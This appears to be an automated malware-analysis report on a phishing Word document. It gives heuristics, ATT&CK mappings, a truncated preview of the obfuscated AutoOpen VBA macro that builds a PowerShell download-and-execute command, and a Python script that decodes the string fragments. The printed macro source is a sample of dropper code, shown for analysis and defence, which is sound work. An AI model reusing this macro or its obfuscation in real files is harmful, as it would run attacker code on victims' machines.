MALICIOUS (Risk Score: 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE (binary Word) document containing VBA macros. An AutoOpen macro is present, so the code runs as soon as the document is opened with macros enabled, and the VBA project contains a Shell() call, indicating an attempt to execute arbitrary commands; this is the usual way such lures fetch and run a second-stage payload. In the extracted source, AutoOpen uses Application.Run to call a routine that is not shown in the preview, passing it the value returned by the function lhXTAVLqjs. That function assembles its result piecewise from Mid(StrReverse("...")) literals, interleaved with dead arithmetic on undefined variables (the On Error Resume Next at the top of each routine swallows the resulting errors). Reversing the literals yields PowerShell-style fragments: .REPLAcE(([ChaR]53+[ChaR]107+[ChaR]86),[StRiNg][ChaR]39), which rewrites the filler token 5kV to a single quote; a split http:// scheme; and the (VAriabLe '*mdR*').Name[3,11,2]-JoIn'' construct, which resolves to iex through the MaximumDriveCount variable name. Together these are consistent with a PowerShell download-and-execute one-liner built at run time, but the complete command and its URL are not recoverable from the truncated preview. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' indicates a phishing lure. Two of the remaining findings deserve a caveat: the only URL extracted from the document body, http://schemas.openxmlformats.org/drawingml/2006/main, is a standard Office XML namespace identifier rather than a network indicator, and the legacy WordBasic auto-exec marker fires on the same AutoOpen name and adds no evidence beyond the recovered VBA project.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22784 bytes | 41d1ab2f9dd493fa96440a052c26133a76262b3b5995415c718722cadf4ca036 |
Preview script (first 1,000 lines of the extracted script)

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OmfpDqp"
Sub AutoOpen()
On Error Resume Next
KWfTOWEbZ = jlHZqvzRnMSV - hwTiIXoWiKwLFR / (129574 + jSzYimm - 3915098 + ikAvCzipZwVusw)
DkOAbLOli = MHuVzNuLzkZnna - LSWfSfKoVtn / (3846718 + LJfzFBjvEIrM - 783369 + vHXQwoUP)
tsGLTBTYb = tIzqFbhm - kGJiSOVPjwdrf / (3318159 + PnruhicjjiSvKE - 377695 + jKwkJjOnwwlmaw)
Application.Run "nKcBnvWItv", lhXTAVLqjs
ROrDaSkmE = HacvzTKL - CtjjjmjZDzj / (9346926 + FiQEEGijKwGqc - 6628002 + SndoaHXE)
lhKRttjpU = SVuivODj - rzZqEEZGQTvVih / (5686263 + XupkqiHmfKN - 2261331 + sPktMfHLqGNTn)
End Sub
Function lhXTAVLqjs()
On Error Resume Next
JjqkiNtTv = cwdlEKAtwGrd - hiktGcbLzI / (4887631 + chizlITJBjza - 6471553 + BjUikodYDO)
MMBjkpkfs = kJdvaiqD - bcRuKzXTWwjJLh / (5074349 + qPYlIEiUnBwpOa - 853178 + WhwYOaXm)
pjbFo = JBEhCYbDA - PRSrXwzHIwhF / (9305402 + ZndkBjQrlUwDZm - 6976515 + WmNqopEqZaQ)
ctwFjdw = qfGwkszdQGW + Mid(StrReverse("ikaKjoWkAfEKJiqalzdzADCjaQtLiOdLLFtpZFtp+FtVk5+VkfoNUjp"), 7, 16)
WFLtjs = BUUYjztUYLWfb - rGFkinLbPwcwlt / (9668753 + iUhfktWQJ - 1186963 + FBFwjLmNwFYjHj)
vwqEYYKu = EXvhMAVKhCw - LzjoacqFZKztmz / (6064603 + JFnZzJpwUbuwjr - 4601918 + kPbQORzDQaAtXC)
PkaDAijsz = MUWAbOYwCHlTwi - WimFIXXPksIjJY / (1628155 + bSjhbNqwjMSYId - 9453461 + VWESGRtXoFlISi)
KBtZF = OniEEKIPv + Mid(StrReverse("vuITYvEknDNwzCRqEnCN+FtpmoFtp+Ftpc.sFtp+Ftpe8Db+8Dbl8'+'Db+8DbasorFtp+Ftpoi8Db+8DbgelFtp+FtpoFt'+'p+FtpcFtVk5+Vk5p+Ftp//:pttVk5+Vk5h?/oIMPsBzMMjTwuOba"), 14, 117)
vIRWZVqwki = qZwEzGHuJOmUp - JZIsWbhdBzuiw / (3770467 + jTDvaQszTpwiNJ - 3025609 + DEWAcJJwhKM)
lLroOFbGil = zJUKnzduiY - YQbpCXzTU / (7306126 + raZSTWKHOQ - 845801 + wJVoqOfUtf)
zXzfa = zjAUGYkqrliSt - UfGkbKwUvdjh / (6857586 + FpRaMlb - 6757607 + CDiiaMjTqb)
BVmmEEYWt = XtLJBSBSI + Mid(StrReverse("qRiNWJSpItELPER.)93]RahC[]gNiRtS[,)68]RahC[+701]RahC[+35]RahC[((EcALPER.)8Db ))93]raHc'+'[8Db+8Db,Vk5FtpVk5ecAlPeRc-63]raHc[,VnRtGjkCJRorVQwQsUr"), 19, 115)
PZbjcilF = nWnZpikCUDG - IlLDjtjX / (1398285 + KqFjjVQj - 1703335 + vwvzPdtzpKOPj)
iaztXsCZjd = ukXUDYoTWb - zUIuPlnv / (3016968 + KqOoDzjh - 9334902 + vGllwwvdkCbbTl)
ZFtdO = IkFaYaUTH - uIjAYIlZdQqj / (4559799 + QqKKMkjWdXuPbG - 4551957 + andADpPcLu)
DmwKIvZiUfG = WjYkRUq + Mid(StrReverse("ztjUjETtqzjaOSjk5+Vk5+78]R'+'8Db+8DbaHC[((ECalper.)29]RVk5+Vk5aHC[]VtHiStsaktkuTaI"), 15, 53)
hRfpz = YfIFJji - GqDGWsb / (5215782 + zSuhjIzVCSzp - 1374512 + jGzfJGXCN)
zURQcAJ = zkiWSqRi - iKocTsXL / (6987795 + OhNzZXzX - 2371116 + UKwEiiwda)
hkMdDuGXnRu = MBOhZGs - fnlvmvzimkF / (9834447 + SEQnXNjul - 9203379 + khtNSfaSfVrYjY)
sYlwFLToR = BqUaZMJJiQJGW + Mid(StrReverse("QtKbJRotjwizobEFtp+F'+'tpvxe.Ftp+FtpiEv( + BFtp+FtpS'Y"), 2, 40)
KNQGLCh = uBsIjurrLEBmLH - nTzbjkOz / (2368931 + qpkWJwAQTkY - 4928177 + mzjoNTzSro)
szPVnFSv = kHlRQOj - jdsEHVB / (1217529 + VrXmNzK - 5914267 + vAjMLwBkmBMiAF)
stDvB = VttusZS - MwzzRNWK / (5221502 + RSfWTRtDXjAtT - 4175645 + TRUEQmZcpTOO)
BoqzwfLvRpz = BFDvLXbjtw + Mid(StrReverse("iMZMocdicmiGHakwiqXVNuMzDaWVvnIijvsij"), 7, 3)
OZoYUOOoJoY = jLTibNw - CGKBrpqDFCuTAU / (1826540 + XmAvSvcP - 9343434 + tiAjnllZNk)
ZjzINdzdvl = urwhvUYFVBP - LHoMCiG / (5702995 + ETwMDVPJiaGYhd - 9068884 + OWbEKaV)
SlXYnuWTuAP = coczYjvGHjp - zVswJwnaIc / (5794913 + tJoHfZkdzSj - 2742232 + PkzfARAoXEtic)
VodwCcAZ = jWPrlvimXwZbAp + Mid(StrReverse("IzwrvCUuWb)''nIoJ-]2,11,3[emaN.)'*Rdm*' eLbairAV((. | )93]RAhc[]GNIrts[,'8Db'(ECaLpEr.)') )63]RahC[]gNiRtS[,8DbN'+'Pt8Db(EcAaccoovWrWrSjkXPzDJs"), 20, 114)
rERFLlS = ahliFtMo - HKdoWFvdCiXqCz / (6932932 + tKUErZk - 950914 + wWIzWABwzNo)
BCcTXAzl = KjKzJYCYUXkB - MjrkDiaYMZi / (7499502 + fiWsDjvWiaK - 833219 + BhjHZmGZKRJN)
Wojpzv = fOIwKcMjsYCbTA - EdJjjVj / (8590313 + EzvjEVMMfHDjN - 7065077 + irBJJdfFl)
cQJEh = NmuVzKzFPunahv + Mid(StrReverse("jQZBzwfzj+uNAAKdjDvjCojLmTIJ"), 19
```
... (truncated)
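The string-building pattern in the preview (every fragment is a Mid() over a StrReverse()'d literal) can be decoded statically, without running the macro. The following Python script is an added example, not part of this report, the analyzer, or the sample: it emulates VBA's Mid (1-based start, length clamped to the string) and StrReverse over three lines copied from the preview above, then folds the PowerShell [char]N+[char]M runs that appear in the recovered text so the filler-token replacement becomes readable. The function names, the regular expressions and the SAMPLE_LINES constant are the example's own.

```python
"""Static decoder for the Mid(StrReverse("...")) fragments used by the macro.

Added example: it re-implements the two VBA string functions in Python and
runs them over lines taken from the macro preview instead of executing VBA.
"""
import re

# Exact shape used in the macro: Mid(StrReverse("<literal>"), <start>, <length>).
# VBA escapes a double quote inside a literal as "", so the body allows that pair.
MID_STRREVERSE_RE = re.compile(
    r'Mid\(\s*StrReverse\(\s*"((?:[^"]|"")*)"\s*\)\s*,\s*(\d+)\s*,\s*(\d+)\s*\)',
    re.IGNORECASE,
)

# PowerShell [char]N(+[char]N)* runs written in any letter case, e.g. [ChaR]53+[ChaR]107.
CHAR_RUN_RE = re.compile(r"\[char\]\d+(?:\s*\+\s*\[char\]\d+)*", re.IGNORECASE)
CHAR_CODE_RE = re.compile(r"\[char\](\d+)", re.IGNORECASE)


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start; a length running past the end is clamped."""
    if start < 1 or length < 0:
        raise ValueError("VBA raises 'Invalid procedure call' for start < 1 or length < 0")
    return s[start - 1 : start - 1 + length]


def vba_strreverse(s: str) -> str:
    """VBA StrReverse(): the literal reversed character by character."""
    return s[::-1]


def decode_fragments(vba_source: str) -> list:
    """Return the string each Mid(StrReverse(...)) expression evaluates to, in source order."""
    fragments = []
    for literal, start, length in MID_STRREVERSE_RE.findall(vba_source):
        literal = literal.replace('""', '"')
        fragments.append(vba_mid(vba_strreverse(literal), int(start), int(length)))
    return fragments


def fold_char_codes(text: str) -> str:
    """Replace every [char]N+[char]M... run with the string it builds, shown as a repr literal."""

    def _fold(match):
        codes = [int(c) for c in CHAR_CODE_RE.findall(match.group(0))]
        return repr("".join(chr(c) for c in codes))

    return CHAR_RUN_RE.sub(_fold, text)


# Input for the example: three lines copied verbatim from the macro preview on this page.
SAMPLE_LINES = r'''
ctwFjdw = qfGwkszdQGW + Mid(StrReverse("ikaKjoWkAfEKJiqalzdzADCjaQtLiOdLLFtpZFtp+FtVk5+VkfoNUjp"), 7, 16)
BVmmEEYWt = XtLJBSBSI + Mid(StrReverse("qRiNWJSpItELPER.)93]RahC[]gNiRtS[,)68]RahC[+701]RahC[+35]RahC[((EcALPER.)8Db ))93]raHc'+'[8Db+8Db,Vk5FtpVk5ecAlPeRc-63]raHc[,VnRtGjkCJRorVQwQsUr"), 19, 115)
BoqzwfLvRpz = BFDvLXbjtw + Mid(StrReverse("iMZMocdicmiGHakwiqXVNuMzDaWVvnIijvsij"), 7, 3)
'''

if __name__ == "__main__":
    for fragment in decode_fragments(SAMPLE_LINES):
        print(repr(fragment))
        print("   folded:", fold_char_codes(fragment))
```

On these three lines the decoder returns kV+5kVtF+ptFZptF, a 115-character fragment containing .REPLAcE(([ChaR]53+[ChaR]107+[ChaR]86),[StRiNg][ChaR]39) (folded to .REPLAcE(('5kV'),[StRiNg]"'"), i.e. replace the filler token 5kV with a single quote), and Inv. To recover the complete command, run the same decoder over the full macros.bas, join the fragments in the order the macro concatenates its variables, and then apply the replace calls the script itself performs on the assembled string; olevba's --deobf option attempts the StrReverse/Mid evaluation automatically.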